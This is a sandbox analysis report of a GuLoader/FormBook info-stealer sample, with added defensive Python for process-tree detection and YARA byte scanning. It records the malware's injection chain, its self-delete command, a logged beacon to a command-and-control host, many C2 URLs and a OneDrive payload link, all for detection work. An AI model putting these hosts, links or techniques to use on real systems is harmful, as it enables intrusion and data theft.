
Analysis Report: Details Transfer.exe

Overview

General Information

Sample Name: Details Transfer.exe
Analysis ID: 298616
MD5: 5a68db59b96b39791bc1920adf55e892
SHA1: 110d488dda8cea55d1293a532fcb1fcf8e6edd3b
SHA256: cfcc72f5c577d926712f467175daefaddc77a8ec66db29714bcffae22c5cd7d8
Tags: Endurance, exe, GuLoader


Detection

Detected: FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match


Startup

  • System is w10x64
  • Details Transfer.exe (PID: 6716 cmdline: 'C:\Users\user\Desktop\Details Transfer.exe' MD5: 5A68DB59B96B39791BC1920ADF55E892)
    • Details Transfer.exe (PID: 6936 cmdline: 'C:\Users\user\Desktop\Details Transfer.exe' MD5: 5A68DB59B96B39791BC1920ADF55E892)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 6580 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 5316 cmdline: /c del 'C:\Users\user\Desktop\Details Transfer.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
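The process tree above is the complete FormBook execution chain as the sandbox renders it: the sample respawns itself, the second copy injects into explorer.exe, explorer launches an argument-less SysWOW64 binary (mstsc.exe) that becomes the host of the stealer, and that host erases the original file through cmd.exe. The Python below is an added example, not part of the Joe Sandbox report: it encodes the three telemetry checks a detection engineer would derive from this chain and runs them over process-creation events constructed from the tree. Two assumptions are built in: the ppid values follow the sandbox's nesting (explorer.exe is shown under PID 6936 because of injection, not because it was spawned by it), and the image paths of explorer.exe and cmd.exe, which the report gives only as MD5s, are the standard Windows locations.

```python
"""Detect the injection-and-self-delete chain shown in the Startup tree.

Added example, not part of the sandbox report. EVENTS is constructed from the
tree above; the ppid nesting and the explorer.exe/cmd.exe paths are assumptions.
"""
import re
from typing import Dict, List, Tuple

Event = Dict[str, object]

EVENTS: List[Event] = [
    {"pid": 6716, "ppid": 0, "image": r"C:\Users\user\Desktop\Details Transfer.exe",
     "cmdline": r"'C:\Users\user\Desktop\Details Transfer.exe'"},
    {"pid": 6936, "ppid": 6716, "image": r"C:\Users\user\Desktop\Details Transfer.exe",
     "cmdline": r"'C:\Users\user\Desktop\Details Transfer.exe'"},
    # explorer.exe is nested under PID 6936 in the report because of injection
    # (assumption about the rendering); its path is assumed, the report gives only the MD5.
    {"pid": 3388, "ppid": 6936, "image": r"C:\Windows\explorer.exe", "cmdline": ""},
    {"pid": 6580, "ppid": 3388, "image": r"C:\Windows\SysWOW64\mstsc.exe",
     "cmdline": r"C:\Windows\SysWOW64\mstsc.exe"},
    {"pid": 5316, "ppid": 6580, "image": r"C:\Windows\SysWOW64\cmd.exe",  # path assumed
     "cmdline": r"/c del 'C:\Users\user\Desktop\Details Transfer.exe'"},
    {"pid": 1968, "ppid": 5316, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# "/c del <path>" with optional single or double quotes around the path.
DEL_RE = re.compile(r"""/c\s+del\s+['"]?(?P<path>[^'"]+?)['"]?\s*$""", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(events: List[Event], pid: int) -> List[Event]:
    """Walk ppid links upward from pid (nearest ancestor first)."""
    by_pid = {e["pid"]: e for e in events}
    chain, e = [], by_pid.get(pid)
    while e is not None and e["ppid"] in by_pid:
        e = by_pid[e["ppid"]]
        chain.append(e)
    return chain


def detect(events: List[Event]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) for every event that trips one of the three checks."""
    by_pid = {e["pid"]: e for e in events}
    findings: List[Tuple[str, int]] = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        image = str(e["image"]).lower()
        cmdline = str(e["cmdline"]).strip()
        # 1. A binary under C:\Users re-launching its own image (loader stage hand-off).
        if parent and str(parent["image"]).lower() == image and image.startswith("c:\\users\\"):
            findings.append(("self_spawn_from_user_path", e["pid"]))
        # 2. explorer.exe starting a SysWOW64 binary with no arguments (hollowing host).
        if parent and basename(str(parent["image"])) == "explorer.exe" and "\\syswow64\\" in image:
            if cmdline.strip("'\"").lower() in ("", image):
                findings.append(("explorer_spawns_argless_syswow64", e["pid"]))
        # 3. cmd.exe /c del whose target is the image of an ancestor (loader erasing itself).
        if basename(image) == "cmd.exe":
            m = DEL_RE.search(cmdline)
            if m and any(str(a["image"]).lower() == m.group("path").lower()
                         for a in ancestors(events, e["pid"])):
                findings.append(("self_delete_of_ancestor_image", e["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}")
```

On a real endpoint the third check needs one extra step: explorer.exe is not a child of the sample in Windows telemetry, so the ancestor walk has to be joined with the injection event (the sample writing into explorer.exe, reported further down as "Maps a DLL or memory area into another process") before the deleted path lines up with an ancestor.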

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings

0000000C.00000002.471474023.0000000000AF0000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C

0000000C.00000002.472575056.0000000000F10000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

[19 further memory dump entries are not shown in this excerpt]
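The string lists above are the raw material of the two community rules that fired: the yara-signator rule matches short opcode sequences ($sequence_0 is add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, the RDTSC timing check that also appears among the signatures), and the JPCERT/CC rule matches three x86 push imm32 instructions (opcode 68) whose immediates are constants the unpacked payload pushes before resolving API functions. The Python below is an added example and not part of the report or of either rule's published source: it scans a buffer for exactly those byte strings, decodes the push immediates, and applies assumed hit thresholds (at least two distinct strings per rule) to illustrate how such a match is reached. The buffer and the offsets at which the strings are embedded are constructed for the example.

```python
"""Scan a memory buffer for the byte patterns reported by the YARA matches above.

Added example; not part of the Joe Sandbox report and not the published rules.
The hex strings are copied from the match list; the filler buffer, the
embedding offsets and the hit thresholds in classify() are constructed/assumed.
"""
from typing import Dict, List

# $sequence_* strings of the Formbook_1 rule (yara-signator), as listed above.
FORMBOOK_1 = {
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",   # add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax
    "$sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "$sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "$sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "$sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "$sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "$sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "$sequence_7": "66 89 0C 02 5B 8B E5 5D",
    "$sequence_8": "3C 54 74 04 3C 74 75 F4",
    "$sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
}

# Strings of the JPCERT/CC "Formbook" rule: each is a PUSH imm32 (opcode 68).
JPCERT_FORMBOOK = {
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}


def hexstr(s: str) -> bytes:
    """'68 34 1C 7B E1' -> b'\\x68\\x34\\x1c\\x7b\\xe1'."""
    return bytes.fromhex(s.replace(" ", ""))


def scan(buf: bytes, strings: Dict[str, str]) -> Dict[str, List[int]]:
    """Return {string_name: [offsets]} for every string that occurs in buf."""
    hits: Dict[str, List[int]] = {}
    for name, hs in strings.items():
        pat = hexstr(hs)
        offs, start = [], 0
        while (i := buf.find(pat, start)) >= 0:
            offs.append(i)
            start = i + 1          # overlapping occurrences are reported too
        if offs:
            hits[name] = offs
    return hits


def push_imm32(seq: bytes) -> int:
    """Decode the little-endian immediate of an x86 'push imm32' (68 xx xx xx xx)."""
    if len(seq) != 5 or seq[0] != 0x68:
        raise ValueError("not a push imm32")
    return int.from_bytes(seq[1:], "little")


def classify(buf: bytes) -> List[str]:
    """Assumed conditions: two distinct strings per rule (not the rules' real conditions)."""
    verdicts = []
    if len(scan(buf, FORMBOOK_1)) >= 2:
        verdicts.append("Formbook_1 (yara-signator)")
    if len(scan(buf, JPCERT_FORMBOOK)) >= 2:
        verdicts.append("Formbook (JPCERT/CC)")
    return verdicts


def build_sample() -> bytes:
    """Constructed buffer: 0x200 NOP bytes with five strings embedded at known offsets."""
    buf = bytearray(b"\x90" * 0x200)

    def put(off: int, hs: str) -> None:
        buf[off:off + len(hexstr(hs))] = hexstr(hs)

    put(0x40, FORMBOOK_1["$sequence_0"])
    put(0x60, FORMBOOK_1["$sequence_8"])
    put(0x80, JPCERT_FORMBOOK["$sqlite3step"])
    put(0x120, JPCERT_FORMBOOK["$sqlite3step"])
    put(0x1a0, JPCERT_FORMBOOK["$sqlite3blob"])
    return bytes(buf)


if __name__ == "__main__":
    sample = build_sample()
    for name, offs in scan(sample, JPCERT_FORMBOOK).items():
        imm = push_imm32(hexstr(JPCERT_FORMBOOK[name]))
        print(f"{name}: push 0x{imm:08X} at {[hex(o) for o in offs]}")
    print("verdicts:", classify(sample))
```

Whether the pushed constants are hashed API names is not stated by the report; the example decodes them only as immediates. Against a real dump, replace build_sample() with the bytes of one of the .sdmp files listed above and the offsets should line up with the ones in the table.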

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Yara detected FormBook
Source: Yara match | File source: 0000000C.00000002.471474023.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.472575056.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.472634942.0000000000F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.301196931.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.305279752.000000001E120000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4x nop then pop ebx, 12_2_00AF7AFC
Source: global traffic | HTTP traffic detected: GET /tds/?EZA0Ip=cSys95436I04mSADwpQi1ekt4VEAsUhCMEpuZHXtcAsHrFUQZFLk08BXkTL1uisVhU9w&DzuXT=Bzr4g89 HTTP/1.1 | Host: www.muzickaoprema.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: DREAMHOST-ASUS
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
Source: explorer.exe, 00000005.00000000.281458025.000000000F4D7000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000005.00000000.275682578.000000000D338000.00000004.00000001.sdmp | String found in binary or memory: http://crl.microsof
Source: Details Transfer.exe, 00000002.00000003.250292065.00000000009FD000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Details Transfer.exe, 00000002.00000003.250292065.00000000009FD000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: Details Transfer.exe, 00000002.00000003.250333048.00000000009CA000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.airesdeblend.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.airesdeblend.com/tds/
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.airesdeblend.com/tds/www.bilzy.info
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.airesdeblend.comReferer:
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.allianceentdj.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.allianceentdj.com/tds/
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.allianceentdj.com/tds/www.annsrobinson.site
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.allianceentdj.comReferer:
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.ancientroots-healing.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.ancientroots-healing.com/tds/
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.ancientroots-healing.com/tds/www.hualele.net
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.ancientroots-healing.comReferer:
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.annsrobinson.site
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.annsrobinson.site/tds/
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.annsrobinson.site/tds/www.ancientroots-healing.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.annsrobinson.siteReferer:
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.bilzy.info
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.bilzy.info/tds/
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.bilzy.info/tds/www.myenvi.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.bilzy.infoReferer:
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.charliejonesllc.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.charliejonesllc.com/tds/
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.charliejonesllc.com/tds/www.virtualipassistant.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.charliejonesllc.comReferer:
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.especiaperu.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.especiaperu.com/tds/
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.especiaperu.com/tds/www.muzickaoprema.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.especiaperu.comReferer:
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.hualele.net
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.hualele.net/tds/
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.hualele.netReferer:
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.kyomicollection.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.kyomicollection.com/tds/
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.kyomicollection.com/tds/www.allianceentdj.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.kyomicollection.comReferer:
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.muzickaoprema.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.muzickaoprema.com/tds/
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.muzickaoprema.com/tds/www.purepumptech.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.muzickaoprema.comReferer:
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.myenvi.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.myenvi.com/tds/
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.myenvi.com/tds/www.kyomicollection.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.myenvi.comReferer:
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.purepumptech.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.purepumptech.com/tds/
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.purepumptech.com/tds/www.stuticollections.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.purepumptech.comReferer:
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.stuticollections.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.stuticollections.com/tds/
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.stuticollections.com/tds/www.todaysdestinations.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.stuticollections.comReferer:
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.thewanderingcanucks.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.thewanderingcanucks.com/tds/
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.thewanderingcanucks.com/tds/www.charliejonesllc.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.thewanderingcanucks.comReferer:
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.todaysdestinations.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.todaysdestinations.com/tds/
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.todaysdestinations.com/tds/www.thewanderingcanucks.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.todaysdestinations.comReferer:
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.virtualipassistant.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.virtualipassistant.com/tds/
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.virtualipassistant.com/tds/www.airesdeblend.com
Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmp | String found in binary or memory: http://www.virtualipassistant.comReferer:
Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: Details Transfer.exe, 00000002.00000002.301740842.0000000000957000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/
Source: Details Transfer.exe, 00000002.00000002.301740842.0000000000957000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/#
Source: Details Transfer.exe, 00000002.00000003.250333048.00000000009CA000.00000004.00000001.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=432009286F6EA0CF&resid=432009286F6EA0CF%21110&authkey=AD4IJ_D
Source: Details Transfer.exe, 00000002.00000003.250333048.00000000009CA000.00000004.00000001.sdmp | String found in binary or memory: https://wtvbxg.am.files.1drv.com
Source: Details Transfer.exe, 00000002.00000002.301740842.0000000000957000.00000004.00000020.sdmp | String found in binary or memory: https://wtvbxg.am.files.1drv.com/
Source: Details Transfer.exe, 00000002.00000002.301740842.0000000000957000.00000004.00000020.sdmp | String found in binary or memory: https://wtvbxg.am.files.1drv.com/a
Source: Details Transfer.exe, 00000002.00000002.301868162.00000000009A1000.00000004.00000020.sdmp | String found in binary or memory: https://wtvbxg.am.files.1drv.com/qJk
Source: Details Transfer.exe, 00000002.00000003.250278357.00000000009F3000.00000004.00000001.sdmp | String found in binary or memory: https://wtvbxg.am.files.1drv.com/y4mSG2EAeygiZq04_brgO4pk7tDtOzMyFuiQgTmNd6vFBKuOqsN9bPeMJI63sgTA8uM
Source: Details Transfer.exe, 00000002.00000003.250465501.00000000009B5000.00000004.00000001.sdmp | String found in binary or memory: https://wtvbxg.am.files.1drv.com/y4m_gXgPZ3oxWxrNUMUf4kNQkfH2Qjv3iriglx6tl4Vi-9FIRKJZdSRHkJJ_DBj7L0v
Source: Details Transfer.exe, 00000002.00000003.250292065.00000000009FD000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
